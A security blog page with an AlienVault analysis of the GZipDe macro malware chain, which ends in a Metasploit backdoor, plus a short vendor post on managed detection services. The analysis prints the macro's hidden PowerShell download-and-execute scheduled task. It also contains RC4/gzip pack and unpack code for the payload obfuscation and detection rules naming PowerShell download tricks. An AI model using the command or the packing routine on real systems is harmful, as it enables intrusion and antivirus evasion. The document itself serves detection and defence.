AlienVault Blogs


GZipDe: An Encrypted Downloader Serving Metasploit

Wed, 2018/06/20 - 18:44
At the end of May a Middle Eastern news network published an article about the upcoming Shanghai Cooperation Organization Summit. A week ago, AlienVault Labs detected a new malicious document targeting the region. It uses a piece of text taken from that report as a decoy.

This is the first step of a multistage infection in which several servers and artifacts are involved. Although the final goal seems to be the installation of a Metasploit backdoor, we found an interesting .NET downloader which uses a custom encryption method to obfuscate process memory and evade antivirus detection.

Malicious Document

The file, which was uploaded to VirusTotal by a user in Afghanistan, contains macro malware embedded in a MS Office Word document (.doc). When opened, it executes a Visual Basic script stored as a hexadecimal stream, which creates a scheduled task that runs a hidden PowerShell console:

'C:\Windows\System32\schtasks.exe' /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR 'Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\\\'http://118.193.251[.]137/dropbox/?p=BT67HU78HZ\\\',\\\'$env:public\svchost325.vbs\\\');(New-Object -com Shell.Application).ShellExecute(\\\'$env:public\svchost325.vbs\\\');' /F

The task is named WindowsUpdate to blend in and repeats every minute (/sc MINUTE /MO 1). Each run fetches the next stage over plain HTTP from http://118.193.251[.]137/dropbox/?p=BT67HU78HZ, saves it as svchost325.vbs in the Public user profile ($env:public) and executes it through Shell.Application. We are missing this step of the infection chain, as the server is now offline. Based on the common path we believe the following file is related, and may be part of the later infection steps: http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe

GZipDe - The Encrypted Downloader

The internal name of this malware is Gzipde, as given by the PDB path left over from the build on the attacker's machine: \Documents\Visual Studio 2008\Projects\gzipde\gzipde\obj\Debug\gzipde.pdb

We found the original reverse-tcp payload loader publicly available on GitHub; the attacker added an additional layer of encryption around the payload in this version.

It consists of a Base64 string, named GZipDe, which is compressed and custom-encrypted with a symmetric-key algorithm, likely to avoid antivirus detection. The key is hard-coded as an array of bytes. After Base64 decoding and decompression, the data passes through a decryptor: the encryption method used is RC4 with a key length of 23 bytes.

The malware then allocates a new memory page with execute, read and write permissions (VirtualAlloc with PAGE_EXECUTE_READWRITE), copies the decrypted payload into it and launches a new thread (CreateThread) to execute it. The code also imports the Win32 WaitForSingleObject function, which blocks on a synchronization object such as a mutex until it is signalled. Used this way, it prevents multiple instances of the same malware from running at the same time, which would needlessly increase resource usage and produce more network noise.

The payload contains shellcode that contacts the server at 175.194.42[.]8. Although the server is no longer up, Shodan recorded it serving a Metasploit payload. Metasploit is becoming a popular choice in targeted attacks.

The Metasploit payload

The server, 175.194.42[.]8, delivers a Metasploit stage. It consists of a DLL whose valid DOS (MZ) header lets it pass as an ordinary PE file while its first bytes double as bootstrap shellcode, followed by a Meterpreter payload, a capable backdoor. For example, it can gather information from the system and contact the command and control server to receive further commands. The bootstrap maps the entire DLL into memory from the buffer it was received in, so the backdoor operates without writing anything to disk. This technique is called reflective DLL injection. From this point, the attacker can deliver any further payload in order to acquire elevated privileges and move laterally within the local network.

Thanks to Chris Doman and Jaime Blasco for collaboration.

Appendix

File Hashes
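The unpacking sequence described above (Base64 string, decompression, RC4 with a 23-byte key, then raw shellcode), as an added example that is not code from the AlienVault post or from the sample itself. It reverses the layers statically so the payload can be recovered without ever mapping it executable, and then lifts the C2 address out of the decrypted shellcode using the sockaddr_in push sequence that Metasploit's x86 reverse_tcp stager is known to use. Assumptions, labelled in the code: the compression container is gzip (the post only says "zip-compressed"; the malware's name suggests gzip), and SAMPLE_KEY and SAMPLE_SHELLCODE are constructed stand-ins, not the real key or payload. The port in the sample is Metasploit's default 4444; the post does not give the real one.

```python
"""Static unpacking of a GZipDe-style blob: Base64 -> decompress -> RC4.

Added example; not code from the AlienVault post or from the sample.
Assumptions, labelled: the compression container is gzip (the post only
says "zip-compressed"), the RC4 key is the 23-byte array recovered from
the .NET binary, and SAMPLE_KEY / SAMPLE_SHELLCODE are constructed
stand-ins, not the real values.
"""
import base64
import gzip
import re
import socket
import struct
from typing import Optional, Tuple

KEY_LEN = 23  # key length reported for GZipDe


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric: the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def unpack_gzipde(blob_b64: str, key: bytes) -> bytes:
    """Peel the layers in the order the post describes:
    Base64 string -> decompress -> RC4 decrypt -> raw shellcode."""
    if len(key) != KEY_LEN:
        raise ValueError(f"GZipDe uses a {KEY_LEN}-byte RC4 key, got {len(key)}")
    compressed = base64.b64decode(blob_b64)
    encrypted = gzip.decompress(compressed)   # assumption: gzip container
    return rc4(key, encrypted)


def pack_gzipde(shellcode: bytes, key: bytes) -> str:
    """Inverse of unpack_gzipde; used here only to build test input."""
    return base64.b64encode(gzip.compress(rc4(key, shellcode))).decode("ascii")


# Metasploit's x86 reverse_tcp stager builds its sockaddr_in with two pushes:
#   68 <4-byte IP>               push sin_addr
#   68 02 00 <port, big-endian>  push AF_INET | sin_port
# so the C2 can be lifted from the decrypted shellcode without running it.
_REVERSE_TCP = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})", re.DOTALL)


def extract_reverse_tcp_c2(shellcode: bytes) -> Optional[Tuple[str, int]]:
    """Return (ip, port) for a reverse_tcp-style stager, or None.
    Heuristic: other stagers (reverse_http/https) embed their C2 differently."""
    m = _REVERSE_TCP.search(shellcode)
    if not m:
        return None
    return socket.inet_ntoa(m.group(1)), struct.unpack(">H", m.group(2))[0]


# Constructed sample data (not from the real sample): a 23-byte key and a
# shellcode-shaped buffer embedding the post's C2 IP with Metasploit's
# default port 4444 (the real port is not given in the post).
SAMPLE_KEY = bytes(range(0x10, 0x10 + KEY_LEN))
SAMPLE_SHELLCODE = (
    b"\xfc\xe8\x82\x00\x00\x00"     # cld; call ... (Metasploit x86 prologue shape)
    + b"\x90" * 16
    + b"\x68\xaf\xc2\x2a\x08"       # push 175.194.42.8
    + b"\x68\x02\x00\x11\x5c"       # push AF_INET, port 4444
    + b"\x90" * 8
)

if __name__ == "__main__":
    blob = pack_gzipde(SAMPLE_SHELLCODE, SAMPLE_KEY)
    payload = unpack_gzipde(blob, SAMPLE_KEY)
    print("round-trip ok:", payload == SAMPLE_SHELLCODE)
    print("C2:", extract_reverse_tcp_c2(payload))
```

Because RC4 has no integrity check, a wrong key produces garbage rather than an error; the round-trip above only works because the key is known. When analysing the real sample, the key length check and the C2 extractor are the two sanity signals that the recovered bytes are actually the stager rather than mis-decrypted noise.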
IP Addresses

118.193.251[.]137
175.194.42[.]8

URLs

http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe
http://118.193.251[.]137/dropbox/?p=BT67HU78HZ

Network Detection

Multi-purpose:

AV ATTACK_RESPONSE Metasploit Reverse Shell Verification (Echo)
ET ATTACK_RESPONSE Metasploit/Meterpreter - Sending metsrv.dll to Compromised Host
ET ATTACK_RESPONSE Metasploit Meterpreter Reverse HTTPS certificate

Dedicated:

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware CnC Checkin"; flow:established,to_server; content:"/dropbox/?p="; http_uri; depth:12; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; pcre:"/^\/dropbox\/\?p=[a-zA-Z0-9]*$/U"; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware Payload Request"; flow:established,to_server; content:"/dropbox/file"; depth:13; http_uri; content:".exe"; http_uri; distance:0; isdataat:!1,relative; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)

Both rules key on the absence of User-Agent and Referer headers: WebClient.DownloadFile sends neither by default, whereas a browser sends both, which keeps the signatures quiet on ordinary web traffic to the same paths.

Unified Security Management (USM) Correlation Rules
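The logic of the two Dedicated signatures above, re-implemented over raw HTTP requests as an added example (the Suricata rules are AlienVault's; this Python is not, and the request bytes are constructed, not captured). It makes two details of the rules concrete: the negated header checks, and the isdataat:!1,relative on ".exe", which means the URI must end with ".exe" so a trailing query string defeats the payload rule.

```python
"""The two Dedicated Suricata rules, re-implemented over raw HTTP requests
so their matching logic can be exercised offline.

Added example; the Suricata signatures are AlienVault's, this code is not.
All request bytes below are constructed for the example.
"""
import re
from typing import Dict, List, Tuple

# content:"/dropbox/?p="; depth:12  +  pcre:"/^\/dropbox\/\?p=[a-zA-Z0-9]*$/U"
CHECKIN_URI = re.compile(r"^/dropbox/\?p=[a-zA-Z0-9]*$")
# content:"/dropbox/file"; depth:13  +  content:".exe"; isdataat:!1,relative
# (".exe" must be the very end of the URI, so a trailing query string defeats it)
PAYLOAD_URI = re.compile(r"^/dropbox/file.*\.exe$")

RULES = [
    ("AV TROJAN GZipDe MacroMalware CnC Checkin", CHECKIN_URI),
    ("AV TROJAN GZipDe MacroMalware Payload Request", PAYLOAD_URI),
]


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str]]:
    """Minimal HTTP/1.x request-line and header parser (no body handling)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def match_rules(raw: bytes) -> List[str]:
    """Return the msg of every rule the request would trigger."""
    _method, uri, headers = parse_request(raw)
    # Both rules carry content:!"User-Agent|3a| " and content:!"Referer":
    # WebClient.DownloadFile sends neither, a browser sends both.
    if "user-agent" in headers or "referer" in headers:
        return []
    return [msg for msg, pattern in RULES if pattern.match(uri)]


# Constructed traffic (not captured from the real server) ------------------
CHECKIN = (b"GET /dropbox/?p=BT67HU78HZ HTTP/1.1\r\n"
           b"Host: 118.193.251.137\r\n"
           b"Connection: Keep-Alive\r\n\r\n")
PAYLOAD = (b"GET /dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe HTTP/1.1\r\n"
           b"Host: 118.193.251.137\r\n\r\n")
BROWSER = (b"GET /dropbox/?p=BT67HU78HZ HTTP/1.1\r\n"
           b"Host: 118.193.251.137\r\n"
           b"User-Agent: Mozilla/5.0\r\n\r\n")
QUERY_AFTER_EXE = (b"GET /dropbox/files/utorrent.exe?v=2 HTTP/1.1\r\n"
                   b"Host: 118.193.251.137\r\n\r\n")

if __name__ == "__main__":
    for name, req in [("checkin", CHECKIN), ("payload", PAYLOAD),
                      ("browser", BROWSER), ("query-after-exe", QUERY_AFTER_EXE)]:
        print(f"{name:16} -> {match_rules(req)}")
```

The BROWSER case is the practical caveat: an analyst who re-requests the URL from a browser to confirm the sensor will not fire the rule, because the User-Agent negation is doing exactly what it was written to do.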
  • System Compromise - Code Execution - Powershell Process Created by Office Word
  • Delivery & Attack - Suspicious Download - File Download via Office Macro
  • Environmental Awareness - Code Execution - Suspicious PowerShell Arguments
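The three correlation rules above are listed by name only. As an added example (not AlienVault's USM rule logic), here the same three conditions are evaluated over constructed Sysmon-style process-creation events for this chain. The detail worth seeing in code is that Word never spawns powershell.exe in this sample: Word spawns schtasks.exe, and the Task Scheduler service (svchost.exe) later spawns PowerShell, so a parent-based rule alone misses the second hop. The schtasks /TR argument therefore has to be inspected as the code that will run, and the later PowerShell launch has to be judged on its own arguments.

```python
"""Process-creation correlation for the GZipDe macro chain.

Added example; this is not AlienVault's USM rule logic, only the three
rule conditions named above evaluated over constructed Sysmon-style
events (parent image, image, command line). The events, the image paths
and the thresholds are assumptions made for the example.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
LAUNCHERS = {"powershell.exe", "schtasks.exe", "wscript.exe", "cscript.exe",
             "mshta.exe", "cmd.exe"}
# (regex, reason) pairs; two or more hits make a PowerShell command suspicious
SUSPICIOUS_PS = [
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"downloadfile|downloadstring", "WebClient download"),
    (r"shellexecute|start-process|invoke-expression|\biex\b", "runs fetched content"),
    (r"\$env:public|\\users\\public", "drops into Public profile"),
    (r"https?://", "URL in command line"),
]


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def scheduled_command(schtasks_cmdline: str) -> Optional[str]:
    """Pull the /TR argument out of a schtasks /Create line: that string,
    not schtasks itself, is what Task Scheduler will later execute."""
    m = re.search(r"/TR\s+'(.*)'\s+/F", schtasks_cmdline, re.IGNORECASE | re.DOTALL)
    return m.group(1) if m else None


def evaluate(ev: ProcEvent) -> List[str]:
    alerts: List[str] = []
    parent, child = basename(ev.parent_image), basename(ev.image)

    # "Powershell Process Created by Office Word", generalised to the usual launchers
    if parent in OFFICE and child in LAUNCHERS:
        alerts.append(f"Code Execution - {child} created by {parent}")

    # Decide which command line to judge: PowerShell's own, or the one
    # schtasks is registering for Task Scheduler to run later.
    to_inspect: Optional[str] = None
    if child == "powershell.exe":
        to_inspect = ev.command_line
    elif child == "schtasks.exe":
        to_inspect = scheduled_command(ev.command_line)
        if re.search(r"/sc\s+MINUTE\s+/MO\s+1\b", ev.command_line, re.IGNORECASE):
            alerts.append("Persistence - scheduled task repeating every minute")

    # "Suspicious PowerShell Arguments" / "File Download via Office Macro"
    if to_inspect and to_inspect.lstrip().lower().startswith("powershell"):
        reasons = [why for pat, why in SUSPICIOUS_PS
                   if re.search(pat, to_inspect, re.IGNORECASE)]
        if len(reasons) >= 2:
            alerts.append("Suspicious PowerShell Arguments: " + ", ".join(reasons))
    return alerts


# Constructed events. The schtasks command line is the one from the post;
# the image paths and the parent of the second event are assumptions.
SCHTASKS_CMD = (
    r"'C:\Windows\System32\schtasks.exe' /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR "
    r"'Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile("
    r"\\\'http://118.193.251[.]137/dropbox/?p=BT67HU78HZ\\\',\\\'$env:public\svchost325.vbs\\\');"
    r"(New-Object -com Shell.Application).ShellExecute(\\\'$env:public\svchost325.vbs\\\');' /F"
)
EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
              r"C:\Windows\System32\schtasks.exe", SCHTASKS_CMD),
    ProcEvent(r"C:\Windows\System32\svchost.exe",          # Task Scheduler, a minute later
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              scheduled_command(SCHTASKS_CMD) or ""),
    ProcEvent(r"C:\Windows\explorer.exe",                  # benign interactive use
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell Get-Process"),
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(basename(ev.parent_image), "->", basename(ev.image), evaluate(ev))
```

The second event is the one a naive "Office spawns PowerShell" rule never sees; it only alerts because the PowerShell arguments are judged on their own. Tightening the hit threshold to a single reason would also fire on ordinary hidden-window admin scripts, which is why two are required here.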
Yara Rules

import "dotnet"

rule gzipde_hunt
{
    meta:
        author = "AlienVault Labs"
        description = "Hunt rule to identify files related to Gzipde"
        copyright = "Alienvault Inc. 2018"
        reference = ""
    strings:
        $a = "" nocase wide ascii
        $b = "BT67HU78HZ" nocase wide ascii
        $c = "2E0EB747-BE46-441A-A8B1-97AB27B49EC5" nocase wide ascii
        $d = "gzipde.pdb" nocase wide ascii
        $e = "C:\\Users\\jhon\\Documents\\Visual Studio 2008" nocase wide ascii
    condition:
        any of them
}

rule MeterpreterEncryptedPayloadDotNetGzipDE
{
    meta:
        type = "malware"
        description = "GZipDe"
        author = ""
        reference1 = ""
        reference2 = ""
    strings:
        $pdb = "gzipde.pdb"
        $st1 = "PAGE_EXECUTE_READWRITE"
        $st2 = "EncryptInitalize"
        $st3 = "EncryptOutput"
        $st4 = "CreateThread"
        $st5 = "VirtualAlloc"
    condition:
        uint16(0) == 0x5A4D and (
            (dotnet.typelib == "c1181bc0-0102-44e9-82ba-7c1ca7d24219" and
             dotnet.guids[0] == "2e0eb747-be46-441a-a8b1-97ab27b49ec5")
            or $pdb
            or (dotnet.number_of_modulerefs == 1 and dotnet.modulerefs[0] == "kernel32" and all of ($st*))
        )
}
Categories: Security Posts

10 Opportunities for MSPs and MSSPs to Deliver MDR Services

Wed, 2018/06/20 - 15:00
The proliferation of cybersecurity attacks and greater adoption of cloud applications and services is proving that traditional, prevention-only approaches are ineffective. Instead, organizations are focusing more on a detection and response strategy to manage their cybersecurity risk. However, staying up to date with the latest cybersecurity risks, managing multiple point security products, and finding skilled security resources is proving too challenging for many organizations that are instead looking to invest in Managed Detection and Response (MDR) services from their service providers, including MSPs and MSSPs. For service providers, the MDR trend creates an opportunity to stay competitive and add value that helps clients defend and respond to cyber threats. Here are 10 opportunities to embrace and deliver competitive MDR services:
  1. Provide 24-hour monitoring: Most organizations today are online and continuously connected, but many do not have the resources to monitor their IT security across all hours of every day. Offering round-the-clock monitoring takes the burden off resource constrained organizations, and helps reduce their cybersecurity risk both during and outside of regular business hours.
  2. Monitor cloud environments and applications: Many organizations are considering, or have already begun, the drive towards deploying infrastructure in the cloud or even using cloud applications for workloads like e-mail, collaboration, CRM, payroll, identity, and more. However, traditional security tools and existing expertise lack the capability and know-how of monitoring these environments, creating an increasing opportunity for service providers to help organizations on their respective journeys to the cloud.
  3. Identify the attack surface with asset discovery: The assets deployed across an organization's environment represent the surface against which a malicious entity will conduct one or more attacks. With that in mind, a common challenge for IT and security teams, both in terms of managing cost and cybersecurity risk, is keeping track of what assets are deployed and where. Particularly given the ease and speed with which new virtual machines can be created in virtualized and cloud environments, keeping track of changes is critical. Service providers can solve this problem for clients by including asset discovery in their MDR services, providing awareness of and visibility into all assets on-premises and in the cloud.
  4. Perform vulnerability scanning: Finding and addressing vulnerabilities is critical because they are the entry point for many attacks, including ransomware, and it's no surprise that regular vulnerability scanning is a requirement of many compliance regimes. Once you know where all assets are in the environment, the next logical step is to assess them for vulnerabilities, which, given the rate at which new vulnerabilities are published, needs to be performed regularly. While some customers may wish to patch systems on their own, service providers can also offer vulnerability remediation, namely the application of available patches, as an additional service.
  5. Provide log management: Identifying risks and attacks requires analyzing events and logs, and being able to determine the root cause of an attack typically requires piecing together events from across multiple systems. The manual approach of collecting logs from individual systems is resource intensive, and that’s assuming the device still has the logs for the desired timeframe. Service providers can offer a better way with log management, automating the collection of events and logs into a central location, normalizing the log data for easier analysis and investigation, and storage of the data for at least one year to help customers satisfy any regulatory or standards-based log retention requirements (e.g. for PCI DSS), and for security best practice. 
  6. Offer advanced intrusion detection and security analysis: These facilitate the rapid detection of threats across customers' on-premises and cloud environments and applications. Host IDS and file integrity monitoring (FIM), network IDS, and cloud IDS can all give early warning of attacks and unauthorized activity. Additionally, advanced correlation, including the use of machine learning and behavioral monitoring, can identify threats that are not apparent to traditional signature-based defenses.
  7. Provide threat intelligence and context: To get the latest threat indicators and context, some organizations do their own research and analysis, and some acquire threat intelligence from a third party. Both approaches often prove too expensive, in up-front cost and in time, especially when several commercial feeds have to be procured to cover an organization's needs. Service providers who offer threat intelligence as part of their portfolio have a distinct advantage: they can be proactive against new threats, they have the context needed to deliver the right protection and response, and they can quickly show customers that they know the who, what, why and when behind a threat.
  8. Deliver incident validation and response: Once an incident has been detected, the first step is to validate whether it is an actual threat or just noise, which often requires advanced knowledge and experience. The next step is delivering relevant information about each threat—what it is, its strategy and method, its origin and target, the threat actor, and the recommended response. While some organizations may wish to respond on their own, there is an accelerating trend for service providers to contain and/or fully remediate incidents, as well as perform post-incident forensics to identify the root cause.
  9. Deliver backup and recovery capabilities: The simplest form of business continuity, but one that is often poorly implemented across many organizations, is backup and recovery. This provides opportunity for service providers to deliver verified backup, along with the option to fully or partially recover systems and data, in the event of an outage or loss such as from a ransomware attack. Service providers can choose to offer additional business continuity services, such as the provision of warm and hot sites, as additional differentiators.
  10. Provide security consultation: Organizations often invest in disparate protection tools that don’t always work together, that require expertise they lack, or that may not be adequate for the environments they are trying to protect. This is exacerbated by the lack of skilled talent on the market, and new challenges such as protecting cloud and mobile assets. Service providers can address this space by offering consulting services to guide customers on understanding their environment, identify where there are risks, and helping develop and implement a cybersecurity management plan. In addition, service providers can offer training services, such as how customers can recognize phishing attacks, and how to respond if they discover them.
To accelerate your managed security services with AlienVault Unified Security Management, visit 
Categories: Security Posts